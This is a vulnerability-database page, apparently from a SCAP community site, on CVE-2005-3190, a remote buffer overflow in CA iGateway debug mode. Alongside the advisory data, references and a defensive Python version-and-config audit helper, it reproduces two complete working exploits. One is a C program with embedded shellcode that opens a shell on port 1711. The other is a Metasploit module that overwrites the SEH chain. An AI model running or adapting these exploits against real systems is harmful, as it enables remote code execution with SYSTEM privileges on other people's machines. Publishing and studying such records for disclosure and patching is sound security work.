CVE-2005-3190
CVSS 7.5
Published: 2005-10-13 18:02:00
Revised: 2008-09-05 16:53:41
NMCOE

[Original text] Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests.


[CNNVD] Computer Associates Multiple Products HTTP Request Remote Overflow Vulnerability (CNNVD-200510-074)

        Computer Associates is a world-leading security vendor whose products include several anti-virus packages.
        A remote overflow vulnerability exists in multiple Computer Associates products. It is caused by missing bounds checking on user-supplied data and may allow an attacker to execute arbitrary machine code. Note that it is not yet clear exactly which products are affected, so all Computer Associates products are listed as affected.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:ca:igateway:3.0  Computer Associates iGateway 3.0
cpe:/a:ca:igateway:4.0  Computer Associates iGateway 4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3190
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3190
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-074
(official data source) CNNVD

- Other links and resources

http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
(VENDOR_ADVISORY)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
http://xforce.iss.net/xforce/xfdb/22560
(UNKNOWN)  XF  brightstor-igateway-http-get-bo(22560)
http://www.securityfocus.com/bid/15025
(UNKNOWN)  BID  15025
http://www.osvdb.org/19920
(UNKNOWN)  OSVDB  19920
http://securitytracker.com/id?1015045
(UNKNOWN)  SECTRACK  1015045
http://securityreason.com/securityalert/86
(UNKNOWN)  SREASON  86
http://secunia.com/advisories/17085
(UNKNOWN)  SECUNIA  17085
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html
(UNKNOWN)  FULLDISC  20051019 RE: CAID 33485 - Computer Associates iGateway debug mode HTTP GET request buffer overflow vulnerability
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html
(UNKNOWN)  FULLDISC  20051014 CAID 33485 - Computer Associates iGateway debug mode HTTP GET request buffer overflow vulnerability

- Vulnerability information

Computer Associates Multiple Products HTTP Request Remote Overflow Vulnerability
High risk  Buffer overflow
2005-10-13 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
        http://www.cai.com/

- Vulnerability information (1243)

CA iGateway (debug mode) Remote Buffer Overflow Exploit (EDBID:1243)
windows remote
2005-10-10 Verified
5250 egm
N/A
/*ca igateway debug remote overflow -egm erikam@gmail.com*/
/*01.30.05*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

const int MAXSIZE = 17110;

char sc[] = //metasploit
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
"\xbb\x08\xed\x19\x6d\xf7";

int tcp_connect(char *host,int port) {

struct hostent *hp;
struct sockaddr_in addr;
int sock;

if (!(hp=gethostbyname(host))){
fprintf(stderr,"Something died! \n");
return -1;
}

memset(&addr,0,sizeof(addr));
addr.sin_addr=*(struct in_addr*)hp->h_addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
fprintf(stderr,"Dead again!\n");
return -1;
}

if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
fprintf(stderr,"Dead once more! \n");
return -1;
}
return sock;
}

/*Just supply a target ./caigw-win32 hostname */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE+1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

if(!argv[1])
return 0;

memset(buffer,'\x90',MAXSIZE/2);

memcpy(buffer,"GET",3);

for(i=3;i<24;i++)
memcpy(buffer+i," ",1);
for(i=21;i<423;i++)
buffer[i] = 'A';

/* XP SP2*/ 
//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4);
/*W2ksp4 */
memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4);

memcpy(buffer + 460,sc,sclen - 1);
memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16);
buffer[460+sclen+20] = '\0';

if( (sock = tcp_connect(argv[1],5250)) != -1 )
{
int bytes = 0;

printf("[~] Sending request... \n");
bytes = send(sock,buffer,strlen(buffer),0);
printf("[!] Sent [%d] bytes\n",bytes);
}
else 
return -1;

close(sock);
sleep (2);

printf("[@] Now telnet to port 1711\n");
return 0;
}

// milw0rm.com [2005-10-10]

- Vulnerability information (16801)

CA iTechnology iGateway Debug Mode Buffer Overflow (EDBID:16801)
windows remote
2010-04-30 Verified
5250 metasploit
N/A
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the Computer Associates
				iTechnology iGateway component. When <Debug>True</Debug> is enabled
				in igateway.conf (non-default), it is possible to overwrite the stack
				and execute code remotely. This module works best with Ordinal payloads.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-3190' ],
					[ 'OSVDB', '19920' ],
					[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
					[ 'BID', '15025' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
					'Compat'   =>
					{
						'ConnectionType' => '+ws2ord',
					},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Oct 06 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5250),
			], self.class)
	end

	def check
		connect
		sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
		banner = sock.get(-1,3)

		if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		seh = generate_seh_payload(target.ret)
		buffer = Rex::Text.rand_text_alphanumeric(5000)
		buffer[1082, seh.length] = seh
		sploit = "GET /" + buffer + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n\r\n")

		disconnect
		handler
	end
end

- Vulnerability information

OSVDB ID: 19920
Title: CA iGateway Debug Mode HTTP GET Request Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Public

- Vulnerability description

A remote overflow exists in Computer Associates iGateway. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution with SYSTEM privileges resulting in a loss of integrity.

- Timeline

2005-10-10 2005-10-06
2005-10-17 Unknown

- Solution

Upgrade to version 4.0.050623 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
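An added audit helper (not from the advisory, OSVDB, or the Metasploit module) that applies the two conditions this record states: an iGateway build older than the fixed version 4.0.050623, and `<Debug>True</Debug>` set in igateway.conf (non-default). It assumes igateway.conf is well-formed XML containing a `Debug` element somewhere in the tree; the rest of that file's layout is not known here, and the sample configs are constructed.

```python
"""Audit helper for CVE-2005-3190 (added example, not vendor or Metasploit code).

Reports a host as exposed only when BOTH conditions from the record hold:
the installed build predates 4.0.050623 and igateway.conf enables debug mode.
Assumption: igateway.conf is XML with a <Debug> element (per the Metasploit
module description); the surrounding structure is unknown, so the element
is searched for anywhere in the document.
"""
import xml.etree.ElementTree as ET

FIXED_VERSION = "4.0.050623"  # first fixed build named in the advisory


def parse_version(v: str) -> tuple:
    # "4.0.050623" -> (4, 0, 50623); int() drops the leading zero safely,
    # and tuple comparison orders "3.0.40621.0" and "4.0" below the fix.
    return tuple(int(part) for part in v.strip().split("."))


def is_vulnerable_version(v: str) -> bool:
    return parse_version(v) < parse_version(FIXED_VERSION)


def debug_mode_enabled(conf_xml: str) -> bool:
    root = ET.fromstring(conf_xml)
    for el in root.iter("Debug"):
        if (el.text or "").strip().lower() == "true":
            return True
    return False


def assess(version: str, conf_xml: str) -> str:
    """Return 'patched', 'vulnerable-build' or 'exposed'."""
    if not is_vulnerable_version(version):
        return "patched"
    if debug_mode_enabled(conf_xml):
        return "exposed"            # old build AND the trigger condition is on
    return "vulnerable-build"       # upgrade still required; debug off lowers exposure


# Constructed sample configuration fragments (not real igateway.conf files)
CONF_DEBUG_ON = "<igateway><Debug>True</Debug></igateway>"
CONF_DEBUG_OFF = "<igateway><Debug>False</Debug></igateway>"

if __name__ == "__main__":
    # Version string taken from the Metasploit target entry on this page
    print(assess("3.0.40621.0", CONF_DEBUG_ON))   # exposed
    print(assess("3.0.40621.0", CONF_DEBUG_OFF))  # vulnerable-build
```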

- Related references

- Vulnerability author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China dedicated to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.